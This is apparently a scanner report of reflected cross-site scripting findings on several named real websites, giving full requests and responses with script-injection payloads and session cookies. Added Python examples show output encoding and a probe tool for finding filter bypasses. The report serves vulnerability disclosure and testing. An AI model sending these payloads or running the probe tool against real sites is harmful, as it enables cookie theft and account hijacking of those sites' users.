The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a20f3'style%3d'x%3aexpression(alert(1))'86f4c83a4c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a20f3'style='x:expression(alert(1))'86f4c83a4c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (CSS expressions are not evaluated from IE8 standards mode onward), and may not work on other browsers; the single quote that closes the href attribute is reflected unencoded, so the injection point remains exploitable with a payload suited to the target browser.
Request
GET /jiji262/archive/2007/07/28/1713771.aspx?a20f3'style%3d'x%3aexpression(alert(1))'86f4c83a4c1=1 HTTP/1.1 Host: blog.csdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.68 Date: Mon, 28 Feb 2011 13:31:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Length: 64397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <a href='mailto:webmaster@csdn.net?subject=Article%20Report!!!&body=Author:jiji262%0D%0AURL:http://blog.csdn.net/ArticleContent.aspx?UserName=jiji262&Entryid=1713771&a20f3'style='x:expression(alert(1))'86f4c83a4c1=1'> ...[SNIP]...
3.20. http://bossip.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://bossip.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf6c9"><script>alert(1)</script>bda78cec728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf6c9\"><script>alert(1)</script>bda78cec728 in the application's response. As in the addyosmani.com finding, the backslash before the quote is addslashes-style escaping that an HTML parser ignores: the quote still closes the href attribute and the script element that follows is parsed as markup.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bf6c9"><script>alert(1)</script>bda78cec728=1 HTTP/1.1 Host: bossip.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 28 Feb 2011 13:30:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header. X-Pingback: http://bossip.com/xmlrpc.php Link: <http://wp.me/2nLn>; rel=shortlink Content-Length: 140862
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <a href="http://bossip.com/?bf6c9\"><script>alert(1)</script>bda78cec728=1"> ...[SNIP]...
The value of the partnerId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89b64'%3balert(1)//24e01503e82 was submitted in the partnerId parameter. This input was echoed as 89b64';alert(1)//24e01503e82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /collector/tag.js?partnerId=oversee89b64'%3balert(1)//24e01503e82&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Fwww.acelacomm.com%2F&q=high%20speed%20internet%20service HTTP/1.1 Host: c.chango.com Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:11 GMT Content-Type: text/javascript Connection: close Server: TornadoServer/1.1 Etag: "02737ea2ad027a16d88bd0e6bb8ba3eae7372d65" Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _t=075059e6-433e-11e0-ba97-00259009a9c2; Domain=chango.com; expires=Thu, 25 Feb 2021 13:24:11 GMT; Path=/ Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 29 May 2011 13:24:11 GMT; Path=/ Content-Length: 1338
The value of the referrerURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f965"%3balert(1)//ecfa71f1fd7 was submitted in the referrerURL parameter. This input was echoed as 9f965";alert(1)//ecfa71f1fd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /collector/tag.js?partnerId=oversee&siteID=NpAF2Tti8P0PKjSDdT3nmi2mz&logSearch=true&referrerURL=http%3A%2F%2Fwww.acelacomm.com%2F9f965"%3balert(1)//ecfa71f1fd7&q=high%20speed%20internet%20service HTTP/1.1 Host: c.chango.com Proxy-Connection: keep-alive Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:24:11 GMT Content-Type: text/javascript Connection: close Server: TornadoServer/1.1 Etag: "2ae9421c0e5e0da0633b3f40a667e6338fe37628" Pragma: no-cache Cache-Control: no-cache, no-store, max-age=0, must-revalidate P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _t=07644afa-433e-11e0-8a56-00259031f86c; Domain=chango.com; expires=Thu, 25 Feb 2021 13:24:11 GMT; Path=/ Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Sun, 29 May 2011 13:24:11 GMT; Path=/ Content-Length: 1338
3.23. http://comments.csoonline.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://comments.csoonline.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a674"><script>alert(1)</script>d5c3c02a50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?4a674"><script>alert(1)</script>d5c3c02a50=1 HTTP/1.1 Host: comments.csoonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096;
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:32:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:32:26 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44039
3.24. http://comments.csoonline.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://comments.csoonline.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf5d2"-alert(1)-"6df848beb70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bf5d2"-alert(1)-"6df848beb70=1 HTTP/1.1
Host: comments.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096;
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:32:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:32:28 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43843
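Issues 3.23 and 3.24 reflect the *name* of a query parameter rather than its value, which typically means the application writes the raw request URI back into the page (a form action, a canonical link, a script variable holding the current URL). The two sinks are a double-quoted HTML attribute and a double-quoted JavaScript string, and each needs its own encoding. The Python below is an added example, not code from comments.csoonline.com: the two render functions are an assumed model of such a page, the payloads are the ones in the report, and the safe variants show context-specific encoding (html.escape with quote=True is the counterpart of PHP's htmlspecialchars with ENT_QUOTES; the JSON-based encoder is the counterpart of json_encode with JSON_HEX_TAG and JSON_HEX_AMP, available from PHP 5.3). The same two sinks recur in the REST URL parameter findings below, so the example applies to those as well.

```python
"""Reflected XSS sinks from issues 3.23 and 3.24, modelled and hardened (added example).

The render functions are an ASSUMED model of a PHP page that echoes the request
URI into (1) a double-quoted HTML attribute and (2) a double-quoted JS string.
They are not the csoonline.com code; only the payloads come from the report.
"""
import html
import json

# Payloads exactly as submitted in issues 3.23 and 3.24.
ATTR_PAYLOAD = '4a674"><script>alert(1)</script>d5c3c02a50'
JS_PAYLOAD = 'bf5d2"-alert(1)-"6df848beb70'


def render_attr_vulnerable(param_name: str) -> str:
    """Sink 1: the parameter name lands unmodified inside a double-quoted attribute."""
    return f'<form action="/?{param_name}=1" method="post">'


def render_js_vulnerable(param_name: str) -> str:
    """Sink 2: the parameter name lands unmodified inside a double-quoted JS string."""
    return f'<script>var page = "/?{param_name}=1";</script>'


def encode_for_attribute(value: str) -> str:
    """Attribute context: & < > " ' become entities, so the value can never close the quote."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """JS string context: emit a complete JS string literal.

    json.dumps escapes backslash and double quote; the extra replacements turn
    < > & into \\uXXXX so that "</script>" inside the literal cannot end the
    script element (the HTML parser does not understand JS escaping)."""
    literal = json.dumps(value)
    return (literal.replace('<', '\\u003c')
                   .replace('>', '\\u003e')
                   .replace('&', '\\u0026'))


def render_attr_safe(param_name: str) -> str:
    return f'<form action="/?{encode_for_attribute(param_name)}=1" method="post">'


def render_js_safe(param_name: str) -> str:
    # The encoder returns the literal with its own quotes, so none are written here.
    return f'<script>var page = {encode_for_js_string("/?" + param_name + "=1")};</script>'


def echoed_unmodified(rendered: str, payload: str) -> bool:
    """The scanner's own test: the payload appears byte-for-byte in the response."""
    return payload in rendered


if __name__ == "__main__":
    for label, out in [("attr (vulnerable)", render_attr_vulnerable(ATTR_PAYLOAD)),
                       ("attr (safe)", render_attr_safe(ATTR_PAYLOAD)),
                       ("js   (vulnerable)", render_js_vulnerable(JS_PAYLOAD)),
                       ("js   (safe)", render_js_safe(JS_PAYLOAD))]:
        print(f"{label}: {out}")
```

In the vulnerable script sink the browser sees `var page = "/?bf5d2"-alert(1)-"6df848beb70=1";`, which parses as the subtraction `"/?bf5d2" - alert(1) - "6df848beb70=1"` and calls alert while evaluating it; the payload needs neither a semicolon nor a closing script tag, which is why it is the standard probe for this context. In the safe variant the same input becomes `"/?bf5d2\"-alert(1)-\"6df848beb70=1"`, a single string literal.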
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 849b1"%3b189334f2a1f was submitted in the REST URL parameter 1. This input was echoed as 849b1";189334f2a1f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /files849b1"%3b189334f2a1f/csocomments_favicon.ico HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33613
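The finding above is partial: the quote and the semicolon in `849b1"%3b189334f2a1f` survive into the JavaScript string, so the literal can be terminated, but the scanner could not turn that into a working proof of concept and asks for manual follow-up. The same partial result is repeated below for other path segments on this host. The Python below is an added example of that follow-up, not part of the report: it brackets each probe with random markers the way the scanner does, cuts the echo out of the response between the markers, and diffs it against what was sent, so the analyst sees exactly which characters are being dropped. `fake_server` is a constructed stand-in for the 404 page that strips `<`, `>` and parentheses; that filter is an assumption for the demonstration and says nothing about what comments.csoonline.com actually does. To run it against a real target, replace `fake_server` with a function that performs the HTTP request and returns the body.

```python
"""Probe differencing for a partial reflected-XSS finding (added example).

Automates the manual step the report recommends once `";` is known to survive
into a JS string: send probes between random markers, extract the echo, and
report which characters were removed.

`fake_server` is a CONSTRUCTED target for offline use. Its filter (strip <, >,
parentheses) is an assumption for the demo, not observed behaviour of the site.
"""
import re
import secrets
from typing import Callable, Dict, List, Optional

# What an analyst tries next once a bare `";` is known to be echoed intact.
PROBES: List[str] = [
    '";',                                   # reproduce the report: quote and semicolon survive
    '";alert(1)//',                         # close the string, call, comment out the remainder
    '"-alert(1)-"',                         # arithmetic break-out: needs neither ; nor </script>
    '</script><script>alert(1)</script>',   # leave the script element altogether
    '";alert`1`//',                         # tagged-template call: no parentheses at all
]


def fake_server(path_segment: str) -> str:
    """Constructed target: echoes the segment into a double-quoted JS string
    after deleting <, >, ( and ). Swap in a real HTTP fetch for live testing."""
    cleaned = re.sub(r'[<>()]', '', path_segment)
    return f'<script>var path = "/files{cleaned}/csocomments_favicon.ico";</script>'


def reflected_between(body: str, prefix: str, suffix: str) -> Optional[str]:
    """Return the text echoed between the two markers, or None if either is missing."""
    start = body.find(prefix)
    if start == -1:
        return None
    start += len(prefix)
    end = body.find(suffix, start)
    return None if end == -1 else body[start:end]


def probe_once(fetch: Callable[[str], str], payload: str) -> Dict[str, object]:
    """Send one probe wrapped in fresh random markers and diff the echo against it."""
    prefix, suffix = secrets.token_hex(3), secrets.token_hex(3)  # like 849b1 ... 189334f2a1f
    echoed = reflected_between(fetch(prefix + payload + suffix), prefix, suffix)
    if echoed is None:
        return {'sent': payload, 'echoed': None, 'unmodified': False,
                'missing': sorted(set(payload))}
    return {
        'sent': payload,
        'echoed': echoed,
        'unmodified': echoed == payload,
        # characters present in the probe but absent from the echo (dropped or rewritten)
        'missing': sorted(set(payload) - set(echoed)),
    }


def probe_all(fetch: Callable[[str], str],
              probes: List[str] = PROBES) -> Dict[str, Dict[str, object]]:
    return {p: probe_once(fetch, p) for p in probes}


if __name__ == "__main__":
    for result in probe_all(fake_server).values():
        status = "UNMODIFIED" if result['unmodified'] else f"filtered, missing {result['missing']}"
        print(f"{result['sent']!r:42} -> {status}")
```

Against the constructed filter the output shows that every probe using parentheses or angle brackets loses those characters, while the template-literal call `alert`1`` comes back untouched; that is the kind of gap the manual examination is meant to surface. Whether the real application has such a gap is not something the report establishes.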
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9bd8"><script>alert(1)</script>cbf29c1b127 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c9bd8"><script>alert(1)</script>cbf29c1b127/csocomments_favicon.ico HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33673
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fac"><script>alert(1)</script>dc54f79142d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files/14fac"><script>alert(1)</script>dc54f79142d HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33619
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 333b8"%3b26136881516 was submitted in the REST URL parameter 2. This input was echoed as 333b8";26136881516 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /files/csocomments_favicon.ico333b8"%3b26136881516 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:33 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33613
3.29. http://comments.csoonline.com/files/csocomments_favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://comments.csoonline.com
Path: /files/csocomments_favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78001"-alert(1)-"3356cf7e2ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files/csocomments_favicon.ico?78001"-alert(1)-"3356cf7e2ee=1 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33652
3.30. http://comments.csoonline.com/files/csocomments_favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://comments.csoonline.com
Path: /files/csocomments_favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c374d"><script>alert(1)</script>283a11c7a62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files/csocomments_favicon.ico?c374d"><script>alert(1)</script>283a11c7a62=1 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:24 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33697
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c781b"><script>alert(1)</script>e7daab9589f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c781b"><script>alert(1)</script>e7daab9589f/global/logo-techwords.gif HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33679
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1be02"%3bcbdd094398f was submitted in the REST URL parameter 1. This input was echoed as 1be02";cbdd094398f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /images1be02"%3bcbdd094398f/global/logo-techwords.gif HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
